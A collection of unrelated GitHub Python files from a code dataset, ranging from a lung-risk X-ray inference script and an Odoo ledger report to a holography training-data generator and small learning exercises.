**kwargs ): \n return fastai_inceptionv4\n\n custom_head = create_head(nf = 2048*2, n_out = 37) \n fastai_inceptionv4 = nn.Sequential(*list(get_model(model_name = 'inceptionv4').children())[:-2], custom_head) \n \n elif(model_arch == \"resnet34\"):\n mdl = fastai.vision.models.resnet34\n \n elif(model_arch == \"tiny\"):\n manual = True\n mdl = SimpleArchs.get_simple_model(\"Tiny\", out_nodes)\n\n else:\n print(\"Architecture type: \" + model_arch + \" not supported. 
\" \\\n \"Please, make sure the `model_spec` CSV is found in the working directory and can be accessed.\")\n quit()\n\n if(model_arch == 'inceptionv4'):\n learn = cnn_learner(imgs, get_cadene_model,n_out = out_nodes)\n\n elif(manual):\n learn = Learner(imgs,mdl)\n\n else:\n learn = cnn_learner(imgs, mdl, n_out = out_nodes)\n\n except:\n print(\"Architecture not found for model #: \" + str(model_id))\n sys.exit(0)\n\n\n learn.path = Path(mdl_dir.split(\"models\")[0])\n learn.load(mdl_name + \"_\" + str(model_id))\n \n # run the inference phase\n preds, y = learn.get_preds(ds_idx = 1, reorder = False)\n\n # store the raw model predictions for all the subject in `test_set_dir`\n pred_arr[:, model_id] = np.array(preds[:, 0])\n\n\n # parse the LASSO ensemble weights from the CSV file shared with the repository\n ensemble_weights = ensemble_weights_df[\"weight\"].values\n\n # define the LASSO ensemble intercept computed on the tuning set\n lasso_intercept = 49.8484258\n\n # compute the final CXR-Lung-Risk by ensembling the scores\n predictions = np.matmul(pred_arr, ensemble_weights) + lasso_intercept\n\n output_df['CXR_Lung_Risk'] = predictions\n output_df = output_df.drop([\"valid_col\", \"Dummy\", \"Prediction\"], axis = 1)\n\n output_df.to_csv(out_file_path, index = False)\n\n# ----------------------------------------\n# ----------------------------------------\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description = 'Run the CXR-Lung-Risk inference pipeline.')\n\n parser.add_argument(\"--conf\",\n required = False,\n help = \"Specify the path to the YAML file containing details for the inference phase. \" \\\n \"Tries to default to 'config.yaml' under the 'src/' directory.\",\n default = \"config.yaml\")\n\n args = parser.parse_args()\n\n conf_file_path = os.path.join(args.conf)\n\n with open(conf_file_path) as f:\n yaml_conf = yaml.load(f, Loader = yaml.FullLoader)\n\n # dict storing the config args needed to run the main function\n config = dict()\n\n # path to the directory storing the test set\n _, test_dataset_name = os.path.split(yaml_conf[\"input\"][\"test_set_dir\"])\n config[\"test_set_dir\"] = yaml_conf[\"input\"][\"test_set_dir\"]\n config[\"test_dataset_name\"] = test_dataset_name\n\n # path to the directory storing the models\n config[\"mdl_dir\"] = \"../models\"\n\n # name of the CSV file storing the models details (e.g., architecture)\n config[\"model_details_fn\"] = \"CXR_Lung_Risk_Specs.csv\"\n \n # base name for the \".pth\" files of all the models in the ensemble\n config[\"mdl_name\"] = \"Lung_Age_081221\"\n\n # path to the directory where the output should be stored, and base file name for the output\n out_base_path = yaml_conf[\"output\"][\"out_base_path\"]\n\n if not os.path.exists(out_base_path):\n os.mkdir(out_base_path)\n\n out_fn = \"cxr_lung_risk_\" + test_dataset_name + \".csv\"\n\n config[\"out_file_path\"] = os.path.join(out_base_path, out_fn)\n\n # name of the CSV file storing the weights for the ensemble model\n config[\"ensemble_weights_fn\"] = \"ensemble_weights.csv\"\n\n # whether to use the GPU for the processing or not\n config[\"use_gpu\"] = yaml_conf[\"processing\"][\"use_gpu\"] \n config[\"gpu_id\"] = yaml_conf[\"processing\"][\"gpu_id\"] \n\n working_dir = os.getcwd()\n\n # check the script is running from the source code directory of the repository\n print(\"Current working directory:\", working_dir)\n \n assert(os.path.exists(config[\"mdl_dir\"]) and\n os.path.exists(config[\"model_details_fn\"]) and\n 
os.path.exists(config[\"test_set_dir\"]) and \n os.path.exists(config[\"ensemble_weights_fn\"])\n )\n\n assert(len(os.listdir(config[\"mdl_dir\"])) == 20 and\n len(os.listdir(config[\"test_set_dir\"])) > 0\n )\n\n print(\"Location to be parsed for images to process:\", config[\"test_set_dir\"])\n print(\"Location where the output should be saved at:\", config[\"out_file_path\"])\n\n run_cxr_lung_risk(config)\n\n ","repo_name":"AIM-Harvard/CXR-Lung-Risk","sub_path":"src/run_cxr_lung_risk.py","file_name":"run_cxr_lung_risk.py","file_ext":"py","file_size_in_byte":9634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13918332890","text":"import matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom poliastro.bodies import Sun, Mercury, Venus, Earth, Mars, Jupiter, Saturn, Uranus, Neptune\n\n# create objects for the sun and planets\nsun = Sun()\nmercury = Mercury()\nvenus = Venus()\nearth = Earth()\nmars = Mars()\njupiter = Jupiter()\nsaturn = Saturn()\nuranus = Uranus()\nneptune = Neptune()\n\n# create a figure and an axes for the plot\nfig, ax = plt.subplots()\n\n# set the title and axis labels of the plot\nax.set_title(\"Solar System\")\nax.set_xlabel(\"x (km)\")\nax.set_ylabel(\"y (km)\")\n\n# create lines for the sun and planets\nsun_line, = ax.plot([0], [0], \"o\", color=\"orange\")\nmercury_line, = ax.plot([], [], \"o\", color=\"gray\")\nvenus_line, = ax.plot([], [], \"o\", color=\"yellow\")\nearth_line, = ax.plot([], [], \"o\", color=\"blue\")\nmars_line, = ax.plot([], [], \"o\", color=\"red\")\njupiter_line, = ax.plot([], [], \"o\", color=\"brown\")\nsaturn_line, = ax.plot([], [], \"o\", color=\"gold\")\nuranus_line, = ax.plot([], [], \"o\", color=\"cyan\")\nneptune_line, = ax.plot([], [], \"o\", color=\"green\")\n\n# create a list of lines for the planets\nplanet_lines = [mercury_line, venus_line, earth_line, mars_line, jupiter_line, saturn_line, uranus_line, neptune_line]\n\n# create a function that updates the plot at each frame\ndef update_plot(frame):\n # calculate the positions of the sun and planets at the current frame\n sun_pos = sun.orbit.propagate(frame).r\n mercury_pos = mercury.orbit.propagate(frame).r\n venus_pos = venus.orbit.propagate(frame).r\n earth_pos = earth.orbit.propagate(frame).r\n mars_pos = mars.orbit.propagate(frame).r\n jupiter_pos = jupiter.orbit.propagate(frame).r\n saturn_pos = saturn.orbit.propagate(frame).r\n uranus_pos = uranus.orbit.propagate(frame).r\n neptune_pos = neptune.orbit.propagate(frame).r\n\n # update the lines with the new positions\n sun_line.set_data(sun_pos[0], sun_pos[1])\n mercury_line.set_data(mercury_pos[0], mercury_pos[1])\n venus_line.set_data(venus_pos[0], venus_pos[1])\n earth_line.set_data(earth_pos[0], earth_pos[1])\n mars_line.set_data(mars_pos[0], mars_pos[1])\n jupiter_line.set_data(jupiter_pos[0], jupiter_pos[1])\n saturn_line.set_data(saturn_pos[0], saturn_pos[1])\n uranus_line.set_data(uranus_pos[0], uranus_pos[1])\n neptune_line.set_data(neptune_pos[0], neptune_pos[1])\n\n # create an animation object using the update function\n\n\nanim = FuncAnimation(fig, update_plot, frames=365, interval=20)\n\n# display the animation\nplt.show()\n","repo_name":"anegian/Simulation_Net_Metering_Django","sub_path":"simulation/solarSystem.py","file_name":"solarSystem.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5202595700","text":"#generator 
function (yield)\r\n'''\ndef abobora(b=0, maximum=10):\r\n while True:\r\n yield b\r\n b += 1\r\n if b >= maximum:\r\n break\r\n \r\n\r\ngen = abobora()\r\nfor i in gen:\r\n print(i) #no need to call next\r\n'''\r\n'''\r\nPrime Number Generator\r\nThe goal of this exercise is to create a generator function that yields prime numbers indefinitely. \r\nThe generator function will produce the primes one by one, and you can use it to\r\nprint the first N prime numbers or for any other purpose you like.\r\nRemember that a prime number is an integer greater than 1 that has exactly two divisors:\r\n1 and itself.\r\n'''\r\n\r\ndef generator(n=2, limit=10):\r\n primos = set()\r\n while True:\r\n if all(n % p != 0 for p in primos):\r\n primos.add(n)\r\n yield n\r\n if len(primos) >= limit:\r\n break\r\n n += 1\r\n\r\n\r\n\r\nn_primos = generator()\r\nfor i in n_primos:\r\n print(i)","repo_name":"rafalimma/learningpython","sub_path":"generator-treino.py","file_name":"generator-treino.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31651270274","text":"\"\"\"empty message\n\nRevision ID: 4bcca7b679ed\nRevises: \nCreate Date: 2020-09-07 14:51:04.922329\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4bcca7b679ed'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('shows')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('shows',\n sa.Column('actors_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.Column('movies_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.ForeignKeyConstraint(['actors_id'], ['actors.id'], name='shows_actors_id_fkey'),\n sa.ForeignKeyConstraint(['movies_id'], ['movies.id'], name='shows_movies_id_fkey')\n )\n # ### end Alembic commands ###\n","repo_name":"mesh3l-966/capstone","sub_path":"migrations/versions/4bcca7b679ed_.py","file_name":"4bcca7b679ed_.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11013703169","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.tools.misc import format_date, DEFAULT_SERVER_DATE_FORMAT\nfrom datetime import timedelta\n\n\nclass AccountGeneralLedgerReport(models.AbstractModel):\n _inherit = \"account.general.ledger\"\n\n # replaced \"Communication\" column with \"Label\"\n @api.model\n def _get_columns_name(self, options):\n return [\n {'name': ''},\n {'name': _('Date'), 'class': 'date'},\n {'name': _('Label')},\n {'name': _('Partner')},\n {'name': _('Currency'), 'class': 'number'},\n {'name': _('Debit'), 'class': 'number'},\n {'name': _('Credit'), 'class': 'number'},\n {'name': _('Balance'), 'class': 'number'}\n ]\n\n # considered only the label info (aml['name'])\n @api.model\n def _get_aml_line(self, options, account, aml, cumulated_balance):\n if aml['payment_id']:\n caret_type = 'account.payment'\n elif aml['move_type'] in ('in_refund', 'in_invoice', 'in_receipt'):\n caret_type = 'account.invoice.in'\n elif aml['move_type'] in ('out_refund', 'out_invoice', 'out_receipt'):\n caret_type = 'account.invoice.out'\n else:\n caret_type = 'account.move'\n\n # took only label (aml['name']) for 
title\n if aml['name']:\n title = aml['name']\n else:\n title = '' \n\n if aml['currency_id']:\n currency = self.env['res.currency'].browse(aml['currency_id'])\n else:\n currency = False\n\n return {\n 'id': aml['id'],\n 'caret_options': caret_type,\n 'class': 'top-vertical-align',\n 'parent_id': 'account_%d' % aml['account_id'],\n 'name': aml['move_name'],\n 'columns': [\n {'name': format_date(self.env, aml['date']), 'class': 'date'},\n # {'name': self._format_aml_name(aml['name'], aml['ref'], aml['move_name']), 'title': title, 'class': 'whitespace_print'},\n {'name': self._format_aml_name(aml['name'], '/', '/'), 'title': title, 'class': 'whitespace_print'},\n {'name': aml['partner_name'], 'title': aml['partner_name'], 'class': 'whitespace_print'},\n {'name': currency and aml['amount_currency'] and self.format_value(aml['amount_currency'], currency=currency, blank_if_zero=True) or '', 'class': 'number'},\n {'name': self.format_value(aml['debit'], blank_if_zero=True), 'class': 'number'},\n {'name': self.format_value(aml['credit'], blank_if_zero=True), 'class': 'number'},\n {'name': self.format_value(cumulated_balance), 'class': 'number'},\n ],\n 'level': 4,\n }\n","repo_name":"mmdg2019/ppg","sub_path":"account_ext/models/account_general_ledger.py","file_name":"account_general_ledger.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42109863938","text":"from cgbind.calculations import _cgbind_mol_to_autode\nfrom cgbind.molecule import BaseStruct, Molecule\nimport numpy as np\n\n\ndef check_equivalence_ade_and_cgbind_mol(ade_mol, cgb_mol):\n assert cgb_mol.charge == ade_mol.charge\n assert cgb_mol.mult == ade_mol.mult\n if cgb_mol.solvent is not None:\n assert cgb_mol.solvent == str(ade_mol.solvent)\n else:\n assert ade_mol.solvent is None\n assert cgb_mol.name == ade_mol.name\n assert cgb_mol.n_atoms == ade_mol.n_atoms\n\n coords1 = np.array(ade_mol.coordinates)\n coords2 = np.array(cgb_mol.get_coords())\n\n assert np.isclose(coords1, coords2).all()\n\n\ndef test_cgbind_to_ade_mol_conversion():\n mol = Molecule(smiles='CC[O-]', name='test', charge=-1,\n mult=1, solvent='water')\n\n ade_mol = _cgbind_mol_to_autode(mol)\n check_equivalence_ade_and_cgbind_mol(ade_mol, mol)\n\n\ndef test_cgbind_to_ade_conformer_conversion():\n # only works with SMILES as of now (2 Feb 2023)\n mol = Molecule(smiles='CCCCCO', name='test', n_confs=5)\n\n # n_confs is not the true number!!\n ade_mol = _cgbind_mol_to_autode(mol)\n assert ade_mol.n_conformers == len(mol.conformers) - 1\n\n for idx in range(ade_mol.n_conformers):\n cgb_conf = mol.conformers[idx+1]\n ade_conf = ade_mol.conformers[idx]\n check_equivalence_ade_and_cgbind_mol(ade_conf, cgb_conf)\n","repo_name":"duartegroup/cgbind","sub_path":"tests/test_calculations.py","file_name":"test_calculations.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"52"} +{"seq_id":"33640224087","text":"from pyrep.robots.end_effectors.baxter_suction_cup import BaxterSuctionCup\nfrom pyrep.objects.dummy import Dummy\nfrom pyrep.objects.object import Object\n\n\nclass SteroidBaxterSuctionCup(BaxterSuctionCup):\n\n def __init__(self, count: int = 0):\n super().__init__(count=count)\n\n suction_sensor_root = Dummy('BaxterSuctionCup_sensor_root')\n\n sensors = suction_sensor_root.get_objects_in_tree()\n\n self.sensors = [obj for obj in sensors if 'sensor' in 
obj.get_name().lower()]\n\n\n def grasp(self, obj: Object) -> bool:\n \"\"\"Attach the object to the suction cup if it is detected.\n\n EDIT: attach only if all sensors detect the object\n\n Note: This does not move the object up to the suction cup. Therefore, the\n proximity sensor should have a short range in order for the suction\n grasp to look realistic.\n\n :param obj: The object to grasp if detected.\n :return: True if the object was detected/grasped.\n \"\"\"\n # detected = self._proximity_sensor.is_detected(obj)\n detected = True\n for sensor in self.sensors:\n if not sensor.is_detected(obj):\n detected = False\n break\n\n # Check if detected and that we are not already grasping it.\n if detected and obj not in self._grasped_objects:\n self._grasped_objects.append(obj)\n self._old_parents.append(obj.get_parent()) # type: ignore\n obj.set_parent(self._attach_point, keep_in_place=True)\n obj.set_model_dynamic(False)\n return detected","repo_name":"hgiangcao/CODs","sub_path":"ITRIP/SteroidSuctionCup.py","file_name":"SteroidSuctionCup.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"7571498648","text":"import csv\ndef Reader(fileName):\n file=open(fileName)\n dicr=csv.DictReader(file)\n size=[]\n price=[]\n for row in dicr:\n size.append(row['sq__ft'])\n price.append(row['price'])\n file.close()\n return price,size \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"rtl019/MLpractice","sub_path":"regression_analysis/CSV_Reader.py","file_name":"CSV_Reader.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13710487528","text":"import os\nimport numpy as np\nfrom PIL import Image, ImageDraw\nimport random\nfrom tqdm import tqdm\nimport tensorflow as tf\nimport math\nimport yaml\nfrom pathlib import Path\nfrom utils import line_plane_intersection, show_batch_from_filename\nnp.seterr(all = \"raise\")\nimport matplotlib.pyplot as plt\n\n\n\nclass CGHDataProvider:\n def __init__(self, model_name):\n self.path = Path(os.getcwd())\n self.training_data_path = self.path / \"DataProvider\" / \"training_data\"\n self.validation_data_path = self.path / \"DataProvider\" / \"validation_data\"\n self.n_images_per_file = 512\n self.writer_options = tf.io.TFRecordOptions(compression_type='GZIP')\n self._load_config_file(model_name)\n\n self._generate_training_data()\n self._generate_test_data()\n\n def _load_config_file(self, model_name):\n with open(self.path / \"pretrained_model_configs.yaml\") as config_file:\n config = yaml.safe_load(config_file)\n assert config[model_name] is not None, \"No model with the given name present in config file.\"\n model_config = config[model_name]\n\n # Network specific\n self.model_name = model_name\n self.input_shape = model_config[\"network\"][\"shape\"]\n self.nT = model_config[\"network\"][\"num_training_images\"]\n self.nV = model_config[\"network\"][\"num_val_images\"]\n self.dataset_types = model_config[\"network\"][\"training_types\"]\n\n # SLM Specific\n self.lp = model_config[\"slm\"][\"pixel_pitch\"]\n self.Mx, self.My, self.nz = self.input_shape\n self.l0x = self.Mx * self.lp\n self.l0y = self.My * self.lp\n\n # Optical system Specific\n self.wl = model_config[\"system\"][\"wl\"]\n self.dz = model_config[\"system\"][\"dz\"]\n\n self.test_data_path = (self.path / \"dataprovider\" / \"test_data\" / model_config[\"test_data_folder\"] / 
model_config[\"test_data_file\"]).with_suffix(\n '.tfrecords')\n\n # TRAINING, VALIDATION AND TEST DATA\n\n def _create_line(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n while image.max() == 0:\n for plane in range(image_shape[2]):\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n num_lines = random.randint(5, 10)\n for n_line in range(num_lines):\n start_x = random.randint(10, image_shape[0] - 10)\n start_y = random.randint(10, image_shape[1] - 10)\n stop_x = random.randint(10, image_shape[0] - 10)\n stop_y = random.randint(10, image_shape[1] - 10)\n draw_im.line((start_x, start_y, stop_x, stop_y),\n fill=1,\n width=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n image /= image.max()\n\n return image\n\n def _create_circle(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n while image.max() == 0:\n for plane in range(image_shape[2]):\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n num_circles = random.randint(5, 10)\n for n_circle in range(num_circles):\n diameter = random.randint(3, int(min(image_shape[0], image_shape[1]) - 2))\n x_0 = random.randint(10, image_shape[0] - 10)\n y_0 = random.randint(10, image_shape[1] - 10)\n x_1 = x_0 + diameter\n y_1 = y_0 + diameter\n draw_im.ellipse([(x_0, y_0), (x_1, y_1)],\n outline=1,\n fill=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n image /= image.max()\n return image\n\n def _create_sphere(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n if image_shape[-1] == 1:\n return self._create_circle(image_shape)\n image = np.zeros(image_shape)\n min_R = 1.1 * self.dz\n max_R = min(self.l0x, self.l0y) // 6\n n_spheres = random.randint(2, 8)\n center = image_shape[2] // 2\n nnz = 64\n zs = [(zn - center) * self.dz for zn in range(image_shape[2])]\n z_samples_axis = np.linspace(zs[0] - self.dz, zs[-1] + self.dz, nnz)\n while image.max() == 0:\n for sphere in range(n_spheres):\n centerx = random.choice(range(image_shape[0]))\n centery = random.choice(range(image_shape[1]))\n centerz = random.choice(z_samples_axis)\n sphere_radius = np.random.uniform(min_R, max_R)\n for z in range(image_shape[2]):\n im = Image.fromarray(image[:, :, z])\n draw_im = ImageDraw.Draw(im)\n delta_z = np.abs(centerz - zs[z])\n if sphere_radius > delta_z:\n cross_section_radius = np.sqrt(sphere_radius ** 2 - delta_z ** 2) // self.lp\n draw_im.ellipse([(centerx - cross_section_radius, centery - cross_section_radius),\n (centerx + cross_section_radius, centery + cross_section_radius)],\n fill=1)\n image[:, :, z] = np.array(im, dtype='float32')\n if z != 0 and image[:, :, 0].max() != 0 and image[:, :, z].max() != 0:\n image[:, :, z] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, z] ** 2))\n\n image -= image.min()\n image /= image.max()\n return image\n\n def _create_cylinder(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n 
plane_vector = [0, 0, 1]\n num_cyls = random.randint(3, 8)\n max_R = min(image_shape[0], image_shape[1]) / 2\n center = image_shape[2] // 2\n zs = [(zn - center) * self.dz for zn in range(image_shape[2])]\n startz = zs[0]\n endz = zs[-1]\n while image.max() == 0:\n for cyl in range(num_cyls):\n startx = random.choice(range(image_shape[0]))\n starty = random.choice(range(image_shape[1]))\n\n endx = random.choice(range(image_shape[0]))\n endy = random.choice(range(image_shape[1]))\n\n line_vector = [endx - startx, endy - starty, endz - startz]\n norm_line_v = line_vector / np.linalg.norm(line_vector)\n line_point = [startx, starty, startz]\n radius = random.uniform(0.1, 1) * max_R\n radii = radius * norm_line_v\n for plane in range(image_shape[2]):\n plane_point = [startx, starty, zs[plane]]\n I = line_plane_intersection(line_vector, line_point, plane_vector, plane_point)\n if I is not None:\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n x_1 = I[0] + radii[0]\n y_1 = I[1] + radii[1]\n draw_im.ellipse([(I[0] - radii[0], I[1] - radii[1]), (x_1, y_1)], fill=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n try:\n image /= image.max()\n except FloatingPointError:\n print(\"cylinder\")\n print(image)\n return image\n\n def _create_polygon(self, shape=None):\n image_shape = shape if shape is not None else (self.Mx, self.My, self.nz)\n image = np.zeros(image_shape)\n while image.max() == 0:\n for plane in range(image_shape[2]):\n im = Image.fromarray(image[:, :, plane])\n draw_im = ImageDraw.Draw(im)\n num_polys = random.randint(5, 10)\n for n_poly in range(num_polys):\n radius = random.randint(5, int(image_shape[0] - 2))\n x_0 = random.randint(10, image_shape[0] - 10)\n y_0 = random.randint(10, image_shape[1] - 10)\n n_sides = random.randint(3, 6)\n xs = [random.randint(x_0, x_0 + radius) for n in range(n_sides)]\n ys = [random.randint(y_0, y_0 + radius) for n in range(n_sides)]\n xy = [val for pair in zip(xs, ys) for val in pair]\n draw_im.polygon(xy, outline=1, fill=1)\n image[:, :, plane] = np.array(im, dtype='float32')\n if plane != 0 and image[:, :, 0].max() != 0 and image[:, :, plane].max() != 0:\n image[:, :, plane] *= np.sqrt(np.sum(image[:, :, 0] ** 2) / np.sum(image[:, :, plane] ** 2))\n image -= image.min()\n image /= image.max()\n\n return image\n\n def _generate_training_data(self):\n\n # Check whether training dataset exists already\n dir_name = \"TRAIN-Mx{}-My{}-nz{}-nT{}\".format(self.Mx,\n self.My,\n self.nz,\n self.nT)\n if os.path.isdir(os.path.join(self.training_data_path, dir_name)):\n print(\"Chosen training data already exists. 
Continuing...\")\n else:\n os.mkdir(self.training_data_path / dir_name)\n n_files = self.nT // self.n_images_per_file\n if n_files == 0:\n n_files = 1\n n_images = self.nT\n else:\n n_images = self.n_images_per_file\n\n for file_index in range(n_files):\n file_name = \"file_{}.tfrecords\".format(file_index)\n with tf.io.TFRecordWriter(str(self.training_data_path / dir_name / file_name), options=self.writer_options) as writer:\n progress = tqdm(range(n_images))\n progress.set_description(\"Writing training file {} of {} to tfrecords ...\".format(file_index+1, n_files))\n for i in progress:\n rand_select = random.choice(self.dataset_types)\n if rand_select == 'line':\n training_image = self._create_line()\n elif rand_select == 'circle':\n training_image = self._create_circle()\n elif rand_select == 'sphere':\n training_image = self._create_sphere()\n elif rand_select == 'cylinder':\n training_image = self._create_cylinder()\n else:\n training_image = self._create_polygon()\n\n image_bytes = training_image.tostring()\n\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n\n feature = {'image': f}\n\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n\n writer.write(example_to_string)\n self.train_file_path = str(self.training_data_path / dir_name)\n\n self._generate_validation_data()\n\n\n def _generate_validation_data(self):\n # Check whether validation dataset exists already\n dir_name = \"VAL-Mx{}-My{}-nz{}-nV{}\".format(self.Mx,\n self.My,\n self.nz,\n self.nV,)\n if os.path.isdir(os.path.join(self.validation_data_path, dir_name)):\n print(\"Chosen validation data already exists. Continuing...\")\n else:\n os.mkdir(self.validation_data_path / dir_name)\n n_files = self.nV // self.n_images_per_file\n if n_files == 0:\n n_files = 1\n n_images = self.nV\n else:\n n_images = self.n_images_per_file\n\n for file_index in range(n_files):\n file_name = \"file_{}.tfrecords\".format(file_index)\n with tf.io.TFRecordWriter(str(self.validation_data_path / dir_name / file_name), options=self.writer_options) as writer:\n progress = tqdm(range(n_images))\n progress.set_description(\"Writing validation file {} of {} to tfrecords ...\".format(file_index + 1, n_files))\n for i in progress:\n rand_select = random.choice(self.dataset_types)\n if rand_select == 'line':\n val_image = self._create_line()\n elif rand_select == 'circle':\n val_image = self._create_circle()\n elif rand_select == 'sphere':\n val_image = self._create_sphere()\n elif rand_select == 'cylinder':\n val_image = self._create_cylinder()\n else:\n val_image = self._create_polygon()\n\n image_bytes = val_image.tostring()\n\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n\n feature = {'image': f}\n\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n\n writer.write(example_to_string)\n self.val_file_path = str(self.validation_data_path / dir_name)\n\n def _generate_test_data(self):\n # Test data consists of a batch of 32 multiplane images, one batch for each num. 
of planes.\n # Images are a mix of 2D and 3D objects, and portraits.\n\n sizes = [(256, 256), (512, 512), (1024, 1024), (1920, 1080)]\n planes = [1, 3, 5, 7, 11]\n orig_faces_path = self.path / \"test_batch_orig_faces\"\n progress = tqdm(enumerate(sizes))\n progress.set_description(f\"Writing test data\")\n for sizeIndex, size in progress:\n for nPlanes in planes:\n plane_folder = self.path / \"dataprovider\" / \"test_data\" / f\"size_{size[0]}x{size[1]}\"\n if not os.path.isdir(plane_folder):\n os.mkdir(plane_folder)\n filename = plane_folder / f\"TESTBATCH_z_{nPlanes}.tfrecords\"\n shape = (size[1], size[0], nPlanes)\n if not os.path.isfile(filename):\n nPortraitImages = 8\n n2DImages = 8\n n3DImages = 16\n with tf.io.TFRecordWriter(str(filename), options=self.writer_options) as writer:\n portraits = [orig_faces_path / f for f in os.listdir(orig_faces_path) if os.path.isfile(orig_faces_path / f) and f\"{size[0]}x{size[1]}\" in f]\n for i in range(nPortraitImages):\n stackedPortrait = np.zeros(shape)\n selectedPortraits = random.choices(portraits, k=nPlanes)\n for index, portrait in enumerate(selectedPortraits):\n portraitImage = np.array(plt.imread(portrait), dtype='float32')\n portraitImage = np.expand_dims(portraitImage[:, :, 0], axis=[0])\n portraitImage -= portraitImage.min()\n portraitImage /= portraitImage.max()\n stackedPortrait[:, :, index] = portraitImage\n stackedPortraitString = stackedPortrait.tostring()\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[stackedPortraitString]))\n feature = {'image': f}\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n writer.write(example_to_string)\n\n for i in range(n2DImages):\n rand_select = random.choice(['line', 'circle', 'polygon'])\n if rand_select == 'line':\n image2D = self._create_line(shape)\n elif rand_select == 'circle':\n image2D = self._create_circle(shape)\n else:\n image2D = self._create_polygon(shape)\n image_bytes = image2D.tostring()\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n feature = {'image': f}\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n writer.write(example_to_string)\n\n for i in range(n3DImages):\n rand_select = random.choice(['sphere', 'cylinder'])\n if rand_select == 'sphere':\n image3D = self._create_sphere(shape)\n elif rand_select == 'cylinder':\n image3D = self._create_cylinder(shape)\n image_bytes = image3D.tostring()\n f = tf.train.Feature(bytes_list=tf.train.BytesList(value=[image_bytes]))\n feature = {'image': f}\n features = tf.train.Features(feature=feature)\n example = tf.train.Example(features=features)\n example_to_string = example.SerializeToString()\n writer.write(example_to_string)\n\n\n\n\n # FOURIER OPTICS SPECIFIC FUNCTIONS\n def _calculate_phase_factors(self):\n x, y = np.meshgrid(np.linspace(-self.My // 2 + 1, self.My // 2, self.My),\n np.linspace(-self.Mx // 2 + 1, self.Mx // 2, self.Mx))\n Fx = x / self.lp / self.Mx\n Fy = y / self.lp / self.My\n\n center = self.nz // 2\n phase_factors = []\n\n for n in range(self.nz):\n zn = n - center\n p = np.exp(-1j * math.pi * self.wl * (zn * self.dz) * (Fx ** 2 + Fy ** 2))\n phase_factors.append(p.astype(np.complex64))\n self.phase_factors = phase_factors\n\n # TODO: Get training data https://keras.io/examples/keras_recipes/tfrecord/\n def get_training_data(self):\n return self.train_file_path, 
